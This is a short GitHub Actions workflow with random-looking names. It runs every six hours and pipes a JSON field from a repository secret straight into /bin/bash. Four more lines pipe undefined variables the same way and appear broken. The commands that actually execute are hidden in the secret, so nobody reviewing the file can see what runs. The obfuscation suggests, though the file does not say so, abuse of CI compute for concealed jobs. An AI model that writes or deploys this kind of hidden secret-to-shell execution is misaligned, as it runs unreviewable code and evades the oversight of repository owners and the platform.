name: dongyinwei6712

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongyinwei6712
        env:
          nketn89: ${{ secrets.nketn89 }}
        run: |
          echo $nketn89 | jq -r .mf52 | /bin/bash
          echo $drf8 | jq -r .gcl901 | /bin/bash
          echo $ljc13719 | jq -r .mpc156 | /bin/bash
          echo $bzk99 | jq -r .k3848 | /bin/bash
          echo $k53 | jq -r .s281 | /bin/bash

